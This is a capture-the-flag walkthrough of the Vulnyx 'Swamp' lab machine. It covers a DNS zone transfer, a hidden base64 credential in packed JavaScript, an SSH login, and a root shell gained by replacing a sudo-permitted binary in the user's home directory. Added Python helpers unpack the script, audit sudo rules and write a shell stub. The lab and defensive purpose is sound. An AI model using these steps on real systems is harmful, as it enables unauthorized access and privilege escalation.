Vulnyx Swamp Walkthrough (WP)
城南花已开

Information Gathering

Service Enumeration

sudo arp-scan -l
[sudo] password for ctf:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 (Unknown)
192.168.60.2 00:50:56:e3:f6:57 (Unknown)
192.168.60.141 08:00:27:38:c3:84 (Unknown)
192.168.60.254 00:50:56:e0:55:bd (Unknown)

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.931 seconds (132.57 hosts/sec). 4 responded
export ip=192.168.60.141
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Scanning ports like it's my full-time job. Wait, it is.

[~] The config file is expected to be at "/home/ctf/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.141:22
Open 192.168.60.141:53
Open 192.168.60.141:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-07 15:42 CST
Initiating ARP Ping Scan at 15:42
Scanning 192.168.60.141 [1 port]
Completed ARP Ping Scan at 15:42, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:42
Completed Parallel DNS resolution of 1 host. at 15:42, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 15:42
Scanning 192.168.60.141 [3 ports]
Discovered open port 80/tcp on 192.168.60.141
Discovered open port 53/tcp on 192.168.60.141
Discovered open port 22/tcp on 192.168.60.141
Completed SYN Stealth Scan at 15:42, 0.02s elapsed (3 total ports)
Nmap scan report for 192.168.60.141
Host is up, received arp-response (0.00056s latency).
Scanned at 2025-01-07 15:42:41 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
53/tcp open domain syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:38:C3:84 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.30 seconds
Raw packets sent: 4 (160B) | Rcvd: 4 (160B)

Running curl against port 80 by IP prints nothing: the body is empty, and (as the header_checker output later in this writeup shows) the server answers with a 302 Found to http://swamp.nyx.

Opening it in a browser shows the redirect to the hostname swamp.nyx, so the site is served from a name-based virtual host. Add it to /etc/hosts:

sudo vim /etc/hosts
192.168.60.141 swamp.nyx
❯ curl swamp.nyx
<!DOCTYPE html>
<html lang="es">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Welcome to Swamp</title>
<style>
html, body {
height: 100%;
margin: 0;
}
body {
background-image: url('swamp.jpg');
background-size: cover;
background-position: center;
background-repeat: no-repeat;
}
</style>
</head>
<body>


</body>
</html>

Nothing but a background image is served here, so there must be more to find.

Subdomain Enumeration

Port 53 is open, so the target runs its own DNS server. Use dig to ask it for other records; the quickest test is requesting a full zone transfer (AXFR) for swamp.nyx, which a correctly configured server would refuse from an arbitrary client:

❯ dig axfr swamp.nyx @192.168.60.141
; <<>> DiG 9.20.2-1-Debian <<>> axfr swamp.nyx @192.168.60.141
;; global options: +cmd
swamp.nyx. 604800 IN SOA ns1.swamp.nyx. . 2025010401 604800 86400 2419200 604800
swamp.nyx. 604800 IN NS ns1.swamp.nyx.
d0nkey.swamp.nyx. 604800 IN A 0.0.0.0
dr4gon.swamp.nyx. 604800 IN A 0.0.0.0
duloc.swamp.nyx. 604800 IN A 0.0.0.0
f1ona.swamp.nyx. 604800 IN A 0.0.0.0
farfaraway.swamp.nyx. 604800 IN A 0.0.0.0
ns1.swamp.nyx. 604800 IN A 0.0.0.0
shr3k.swamp.nyx. 604800 IN A 0.0.0.0
swamp.nyx. 604800 IN SOA ns1.swamp.nyx. . 2025010401 604800 86400 2419200 604800
;; Query time: 19 msec
;; SERVER: 192.168.60.141#53(192.168.60.141) (TCP)
;; WHEN: Tue Jan 07 22:07:53 CST 2025
;; XFR size: 10 records (messages 1, bytes 309)

Extract the hostnames from the transfer and add them to /etc/hosts as well. Note that every A record in the zone points to 0.0.0.0, so the addresses in the transfer are useless: each name has to be mapped to 192.168.60.141 by hand.

❯ dig axfr swamp.nyx @192.168.60.141|grep -P '\bA\b'|awk '{print $1}'|sed 's/\.$//g' |xargs
d0nkey.swamp.nyx dr4gon.swamp.nyx duloc.swamp.nyx f1ona.swamp.nyx farfaraway.swamp.nyx ns1.swamp.nyx shr3k.swamp.nyx
sudo vim /etc/hosts
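As an added example (not part of the original writeup), the following Python does the same text processing as the pipeline above but emits ready-to-paste /etc/hosts lines, and it maps every name to the target IP rather than to the 0.0.0.0 the zone advertises. The dig output from above is embedded as a constructed sample; CNAME and NS targets are collected too, since a zone with such records would name hosts that never appear as A-record owners.

```python
"""Added example (not from the original writeup): convert `dig axfr` output into
/etc/hosts lines. Every name is mapped to the target IP because the zone's own
A records all say 0.0.0.0 and cannot be used as addresses."""
import re

# Constructed sample: the record lines from the zone transfer shown above,
# with dig's comment lines kept so the parser has to skip them.
AXFR_SAMPLE = """\
; <<>> DiG 9.20.2-1-Debian <<>> axfr swamp.nyx @192.168.60.141
;; global options: +cmd
swamp.nyx.\t\t604800\tIN\tSOA\tns1.swamp.nyx. . 2025010401 604800 86400 2419200 604800
swamp.nyx.\t\t604800\tIN\tNS\tns1.swamp.nyx.
d0nkey.swamp.nyx.\t604800\tIN\tA\t0.0.0.0
dr4gon.swamp.nyx.\t604800\tIN\tA\t0.0.0.0
duloc.swamp.nyx.\t604800\tIN\tA\t0.0.0.0
f1ona.swamp.nyx.\t604800\tIN\tA\t0.0.0.0
farfaraway.swamp.nyx.\t604800\tIN\tA\t0.0.0.0
ns1.swamp.nyx.\t604800\tIN\tA\t0.0.0.0
shr3k.swamp.nyx.\t604800\tIN\tA\t0.0.0.0
swamp.nyx.\t\t604800\tIN\tSOA\tns1.swamp.nyx. . 2025010401 604800 86400 2419200 604800
;; Query time: 19 msec
"""

# One resource record: owner, TTL, class, type, rdata. dig uses tabs, but any
# whitespace is accepted so hand-pasted output parses as well.
RR_LINE = re.compile(r"^(?P<owner>\S+)\s+(?P<ttl>\d+)\s+IN\s+(?P<type>[A-Z]+)\s+(?P<rdata>.+)$")


def parse_axfr(text):
    """Yield (owner, type, rdata) for each record line, skipping dig's ';' comments."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):
            continue
        m = RR_LINE.match(line)
        if m:
            yield m["owner"].rstrip("."), m["type"], m["rdata"].strip()


def hostnames_from_axfr(text):
    """Every hostname the zone mentions: record owners plus CNAME/NS targets,
    deduplicated in first-seen order. The apex (swamp.nyx) is included so the
    base vhost gets an entry too; A/AAAA rdata is ignored on purpose."""
    seen, names = set(), []

    def add(name):
        name = name.rstrip(".")
        if name and name not in seen:
            seen.add(name)
            names.append(name)

    for owner, rtype, rdata in parse_axfr(text):
        add(owner)
        if rtype in ("CNAME", "NS"):
            add(rdata.split()[0])
    return names


def hosts_lines(text, target_ip):
    """Render /etc/hosts lines that all point at target_ip."""
    return [f"{target_ip}\t{name}" for name in hostnames_from_axfr(text)]


if __name__ == "__main__":
    print("\n".join(hosts_lines(AXFR_SAMPLE, "192.168.60.141")))
```

Pipe the real transfer in with `dig axfr swamp.nyx @192.168.60.141 | python3 axfr_hosts.py` (reading stdin instead of the sample) and append the result to /etc/hosts.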

Visit each hostname in turn.

They all just serve a background image.

image

After poking around each vhost, farfaraway.swamp.nyx turns out to include a JavaScript file:

❯ curl http://farfaraway.swamp.nyx/
<!DOCTYPE html>
<html lang="es">
<script src="script.min.js"></script>
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Welcome to Far Far Away</title>
<style>
html, body {
height: 100%;
margin: 0;
}
body {
background-image: url('farfaraway.jpg');
background-size: cover;
background-position: center;
background-repeat: no-repeat;
}
</style>
</head>
<body>

</body>
</html>
❯ curl http://farfaraway.swamp.nyx/script.min.js
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('!M(){1C e;9 1D((e,t)=>{11(()=>{e("1y z 1z: 5")},1L)}).1I(e=>{6.7(e)}).1j(e=>{6.F(e)});8 t=1G e=>{1M{8 t=1g(1g 1l(e)).1p();6.7("1q 1l 2c:",t)}1j(o){6.F("1k 27 1d:",o)}};t("2d://2k.2h.2f/2g"),(()=>{8 e=k.26("1S");e.1T="1P 1V 22 R J 23",k.2b.1X(e)})();1W o{1Y(e,t){B.j=e,B.Q=t}C(){6.7(`${B.j}1Z:${B.Q}`)}}8 a=9 o("1O","1Q"),l=9 o("1R","24");a.C(),l.C();8 r=[1,2,3,4,5],n=r.2i(e=>2*e);6.7("2j 17:",n);8 s=r.2e((e,t)=>e+t,0);6.7("28 1i 17:",s);6.7("29 q:",{j:"T",b:30,2a:"1N"}),2l(()=>{6.7("12 1H 1r 1s 2 Z")},1t),k.1u("1v",()=>{6.7("1m 1o 1n J k")});8 g=9 14;6.7("1w W:",g.Y());8 i=9 14(g.1J()+1,g.1K(),g.1F());6.7("1E W:",i.Y());8 c=e=>{e%2==0?6.7(e+" z 1x"):6.7(e+" z 1A")};[10,21,32,1B,1U].V(c),11(()=>{6.7("12 2V 2W 3 Z")},2X);(e=>{8 t=e(10,20);6.7("2N 1c 2P-2R M:",t)})((e,t)=>e+t);8{X:d,13:u,b:h}={X:"31",13:"33",b:25};6.7(`2m:${d}${u},36:${h}`);8 m=9 19;m.N("j","G"),m.N("b",30),m.N("K","1b 1b 37"),6.7("19 15:"),m.V((e,t)=>{6.7(t+": "+e)});8 p=9 18([1,2,3,4,4,5]);6.7("18 15 (2u 2v):",2x.1c(p));8 $=M*e(){E"2s D",E"2p D",E"2q D"}();6.7($.H().A),6.7($.H().A),6.7($.H().A);6.7("2r, T! 2H R J 2I.");2K:2G;8 f=x.1h(\'{"j":"G","b":30}\');6.7("2F x 1d:",f),"O"1e U?U.O.2B(e=>{6.7("2A 2C K:",e.P.2D,e.P.2E)},e=>{6.F("1k 2L K:",e)}):6.7("2J 2z 2y");8 v=" 2n z 2o! \\n",y=v.2t();6.7("2w 1f:",y);8 S=v.2M();6.7("2Z 1f:",S),I.35("q",x.34({j:"G",b:30}));8 w=x.1h(I.38("q"));6.7("39 q 1e I:",w),6.7("2Q 2O:",L.2S()),6.7("2T 2Y 1i 16:",L.2U(16)),6.7("1a A:",L.1a)}();',62,196,'||||||console|log|let|new||age||||||||name|document||||||user|||||||JSON||is|value|this|speak|part|yield|error|Shrek|next|localStorage|the|location|Math|function|set|geolocation|coords|sound|to||John|navigator|forEach|date|firstName|toString|seconds||setTimeout|This|lastName|Date|values||numbers|Set|Map|PI|Far|from|data|in|string|await|parse|of|catch|Error|fetch|Click|on|detected|json|Data|repeats|every|2e3|addEventListener|click|Current|even|Value|positive|odd|43|var|Promise|Future|getDate|async|message|then|getFullYear|getMonth|1e3|try|USA|Dog|Dynamically|Woof|Cat|div|innerHTML|54|added|class|appendChild|constructor|says|||text|DOM|Meow||createElement|fetching|Sum|Updated|country|body|success|https|reduce|com|posts|typicode|map|Doubled|jsonplaceholder|setInterval|Destructuring|JavaScript|fun|Second|Third|Hello|First|trim|no|duplicates|Trimmed|Array|available|not|Your|getCurrentPosition|current|latitude|longitude|Parsed|c2hyZWs6cHV0b3Blc2FvZWxhc25v|Welcome|page|Geolocation|Password|getting|toUpperCase|Result|number|higher|Random|order|random|Square|sqrt|runs|after|3e3|root|Uppercase||Jane||Doe|stringify|setItem|Age|Away|getItem|Stored'.split('|'),0,{}))

The file is a Dean Edwards style eval(function(p,a,c,k,e,d){...}) packed script. You can paste it into the browser console and run it (the script itself only logs demo values), or replace the outer eval with console.log to print the unpacked source without executing anything.

image

Running it ends with a ReferenceError: the unpacked code contains the statement Password:c2hyZWs6cHV0b3Blc2FvZWxhc25v;, where Password: is just a JavaScript label and the identifier after it is undefined. That identifier looks like base64, so decode it.
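Pasting untrusted JavaScript into a console is a habit worth breaking, so here is an added example (not from the original writeup) that unpacks a p,a,c,k,e,d payload statically and pulls the credential out of it. It reimplements the packer's token encoder and dictionary substitution, then looks for the bare Password:<base64> label that caused the ReferenceError. PACKED_SAMPLE is a constructed miniature in the same layout as script.min.js, not the original file; point the script at the real file to process it.

```python
"""Added example (not part of the original writeup): statically unpack a Dean Edwards
"eval(function(p,a,c,k,e,d){...})" payload and pull out the credential, so the script
never has to run in a browser. PACKED_SAMPLE is a constructed miniature built to the
same layout as script.min.js on farfaraway.swamp.nyx; it is not the original file."""
import base64
import re

PACKED_SAMPLE = (
    "eval(function(p,a,c,k,e,d){/* packer bootstrap elided */}"
    "('5 4=\"6\";2:3;0.1(4)',62,7,"
    "'console|log|Password|c2hyZWs6cHV0b3Blc2FvZWxhc25v|user|var|shrek'.split('|'),0,{}))"
)

# The packer's trailing call: ('<p>',<a>,<c>,'<k>'.split('|'),0,{})
PACKER_CALL = re.compile(
    r"\('((?:[^'\\]|\\.)*)',(\d+),(\d+),'((?:[^'\\]|\\.)*)'\.split\('\|'\)", re.S
)
_ESCAPES = {"n": "\n", "r": "\r", "t": "\t"}


def js_unescape(s):
    """Undo the backslash escaping the packer applied to its string arguments."""
    return re.sub(r"\\(.)", lambda m: _ESCAPES.get(m.group(1), m.group(1)), s, flags=re.S)


def parse_packed(source):
    """Return (p, a, c, k) from the packed source, or raise if the layout is not found."""
    m = PACKER_CALL.search(source)
    if not m:
        raise ValueError("not a p,a,c,k,e,d payload")
    p, a, c, k = m.groups()
    return js_unescape(p), int(a), int(c), js_unescape(k).split("|")


def encode_token(n, a):
    """The packer's index -> identifier map: 0-9, a-z, A-Z, then two-char tokens like '10'."""
    head = "" if n < a else encode_token(n // a, a)
    rem = n % a
    tail = chr(rem + 29) if rem > 35 else (str(rem) if rem < 10 else chr(ord("a") + rem - 10))
    return head + tail


def unpack(p, a, c, k):
    """Rebuild the token dictionary and substitute every word, as the eval'd bootstrap would."""
    table = {}
    for i in range(c):
        tok = encode_token(i, a)
        table[tok] = k[i] if i < len(k) and k[i] else tok
    return re.sub(r"\b\w+\b", lambda m: table.get(m.group(0), m.group(0)), p)


def labeled_base64(code, label="Password"):
    """The credential sits after a bare JS label ('Password:<b64>;'), which is why running
    the script in the console dies with a ReferenceError on the base64 identifier."""
    m = re.search(r"\b" + re.escape(label) + r":\s*([A-Za-z0-9+/]+=*)", code)
    return m.group(1) if m else None


def recover_credential(source):
    """Unpack, find the labeled base64 blob, decode it and split it as user:password."""
    code = unpack(*parse_packed(source))
    b64 = labeled_base64(code)
    if b64 is None:
        return None
    plain = base64.b64decode(b64).decode("utf-8")
    user, _, password = plain.partition(":")
    return user, password


if __name__ == "__main__":
    import sys
    src = open(sys.argv[1]).read() if len(sys.argv) > 1 else PACKED_SAMPLE
    print(unpack(*parse_packed(src)))
    print(recover_credential(src))
```

Run it as `python3 unpack.py script.min.js` to print the readable source; the dictionary fallback (`k[i] or tok`) matters because the packer leaves entries empty for tokens that stand for themselves, such as small integers.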

image

Getting a User Shell

Decoding gives shrek:putopesaoelasno; log in over SSH with it.

image

sudo -l shows that shrek can run /home/shrek/header_checker as root without a password. Since the binary lives in shrek's own home directory, shrek can read, write and execute it, and that is the whole weakness.

❯ ssh shrek@192.168.60.141
The authenticity of host '192.168.60.141 (192.168.60.141)' can't be established.
ED25519 key fingerprint is SHA256:q2oJVk8pvyNE1iEAucoSG9iwm1MeIlnMRT7L9fXkqzI.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.60.141' (ED25519) to the list of known hosts.
shrek@192.168.60.141's password:
Linux swamp 6.1.0-18-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.76-1 (2024-02-01) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Jan 4 13:12:39 2025 from 192.168.1.33
shrek@swamp:~$ ls
header_checker user.txt
shrek@swamp:~$ cat user.txt
7d199d72f12135ef193ad19faf9468ef
shrek@swamp:~$ sudo -l
Matching Defaults entries for shrek on swamp:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User shrek may run the following commands on swamp:
(ALL) NOPASSWD: /home/shrek/header_checker

Running it without arguments prints the usage; judging by the progress meter in the output, it is a wrapper around curl.

shrek@swamp:~$ ./header_checker
Error: --url is required.
Usage: ./header_checker --url '<url>' [--timeout <timeout>] [--method <method>] [--headers <custom_headers>]

Flags:
--url '<url>' The URL to fetch headers from (required)
--timeout <timeout> The maximum time (in seconds) to wait for a response (optional, default: 10)
--method <method> The HTTP method to use (optional, default: GET)
--headers <headers> Custom headers to send with the request (optional)
--help Display this help message
Example: ./header_checker --url "google.com"
shrek@swamp:~$ ./header_checker --url 127.0.0.1
Fetching response headers from: 127.0.0.1
Timeout: 10 seconds
HTTP Method: GET
Custom Headers:
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
Response Headers:
HTTP/1.1 302 Found
Date: Tue, 07 Jan 2025 22:29:41 GMT
Server: Apache/2.4.62 (Debian)
Location: http://swamp.nyx
Content-Length: 0
Content-Type: text/html; charset=UTF-8

Copy the binary to the attacking machine for a closer look.

❯ scp shrek@192.168.60.141:header_checker .
shrek@192.168.60.141's password:
header_checker
❯ file header_checker
header_checker: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=92705383d5f382278a2724d604e2523e7f73e4cb, for GNU/Linux 3.2.0, stripped

Run strings on it.

❯ strings header_checker
/lib64/ld-linux-x86-64.so.2
exit
stat
strdup
time
strlen
getpid
execvp
malloc
__libc_start_main
stderr
fprintf
__cxa_finalize
sprintf
putenv
strerror
getenv
calloc
memcmp
memset
__isoc99_sscanf
atoll
memcpy
fwrite
__errno_location
__environ
libc.so.6
GLIBC_2.7
GLIBC_2.14
GLIBC_2.33
GLIBC_2.34
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
PTE1
u+UH
ATSH
[A\]
x%lx
=%lu %d
%lu %d%c
E: neither argv[0] nor $_ works.
<null>
%s%s%s: %s
;*3$"
fi=+@
\_cV
#I`k
d:uTq<
IjCyx/sT
*rF0
5q4$i&
tuFe
'FDT
`MMl@
aoP8
k1pY
uQ8TT*x
(t7{
o;(/G
|voE
b8)j
_yrd
4rhD
UHL_
h.+w
;]PcSZ
_473
*SFu
)[P.
Qf2M
Ou}(
fnK$r
M=Pc
~HMm3
nIhV
ih3#
bX+]
F.2h
we-w
nXp2
h 3_
GCC: (Debian 12.2.0-14) 12.2.0
.shstrtab
.interp
.note.gnu.property
.note.gnu.build-id
.note.ABI-tag
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.got.plt
.data
.bss
.comment

There is no curl string anywhere in the output. The imports are plain libc (execvp, getenv, putenv, stat, time, getpid), the messages `%s%s%s: %s` and `E: neither argv[0] nor $_ works.` are the runtime strings of shc, a tool that wraps an encrypted shell script in an ELF stub, and the rest is high-entropy garbage. The embedded script (which evidently calls curl) is only decrypted in memory and handed to a shell through execvp at run time, so strings will never show it.

Root Privilege Escalation

The sudo rule points at a file inside shrek's home directory, and shrek owns that directory, so the file can simply be deleted.

Delete it, write a new header_checker that spawns a shell, and run it through sudo to get a root shell. The replacement below has no shebang; it still works because sudo falls back to running a file through /bin/sh when execve fails with ENOEXEC, but a #!/bin/bash first line makes the intent explicit.

shrek@swamp:~$ rm header_checker
shrek@swamp:~$ echo 'bash'>header_checker
shrek@swamp:~$ chmod +x header_checker
shrek@swamp:~$ sudo -l
Matching Defaults entries for shrek on swamp:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User shrek may run the following commands on swamp:
(ALL) NOPASSWD: /home/shrek/header_checker
shrek@swamp:~$ sudo /home/shrek/header_checker
root@swamp:/home/shrek# id
uid=0(root) gid=0(root) groups=0(root)
root@swamp:/home/shrek# cat /root/root.txt
9c7bddee2e2fb8ad03854f106f23c6b5
root@swamp:/home/shrek#
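The lesson for the defensive side is that a sudo rule must never point at a path the invoking user can replace. As an added example (not from the original writeup), the Python below parses sudo -l output, flags every rule target whose file or parent directory is writable by the current user, and stages the same replacement used above but with an explicit shebang. SUDO_L_SAMPLE is constructed to mirror the sudo -l output on this page.

```python
"""Added example (not from the original writeup): check whether the targets of a user's
sudo rules can be replaced by that user, which is exactly the misconfiguration abused
above. SUDO_L_SAMPLE is constructed to mirror the `sudo -l` output on this page."""
import os
import re
import stat

SUDO_L_SAMPLE = """\
Matching Defaults entries for shrek on swamp:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin, use_pty

User shrek may run the following commands on swamp:
    (ALL) NOPASSWD: /home/shrek/header_checker
"""

# A rule line: "(runas) [TAG:]... cmd [args], cmd2 [args]"; only the command paths matter here.
RULE_LINE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")


def sudo_rule_commands(sudo_l_text):
    """Return the absolute command paths from the 'may run' section of sudo -l output.
    Each comma-separated command spec contributes its first token (the executable)."""
    in_rules = False
    cmds = []
    for line in sudo_l_text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules:
            continue
        m = RULE_LINE.match(line)
        if not m:
            continue
        for spec in m["cmds"].split(","):
            tok = spec.strip().split()
            if tok and tok[0].startswith("/"):
                cmds.append(tok[0])
    return cmds


def replaceable_by_me(path):
    """True if the current user can change what sudo will execute: either the file itself
    is writable, or its directory is (delete and recreate, as done in the writeup)."""
    if os.access(path, os.W_OK):
        return True
    return os.access(os.path.dirname(path) or ".", os.W_OK)


def audit(sudo_l_text):
    """Map each rule target to whether the current user could swap it out."""
    return {cmd: replaceable_by_me(cmd) for cmd in sudo_rule_commands(sudo_l_text)}


def stage_shell_stub(path, shell="/bin/bash"):
    """Write the replacement the writeup used, but with an explicit shebang so it does not
    rely on sudo's ENOEXEC fallback to /bin/sh. Returns the text written."""
    body = f"#!{shell}\nexec {shell}\n"
    with open(path, "w") as fh:
        fh.write(body)
    os.chmod(path, os.stat(path).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
    return body


if __name__ == "__main__":
    for cmd, weak in audit(SUDO_L_SAMPLE).items():
        print(f"{'REPLACEABLE' if weak else 'ok':<12} {cmd}")
```

On the box, `sudo -l | python3 sudo_audit.py` (reading stdin instead of the sample) prints REPLACEABLE for /home/shrek/header_checker; the fix is to install the helper root-owned under /usr/local/bin with mode 755 and point the sudoers entry there.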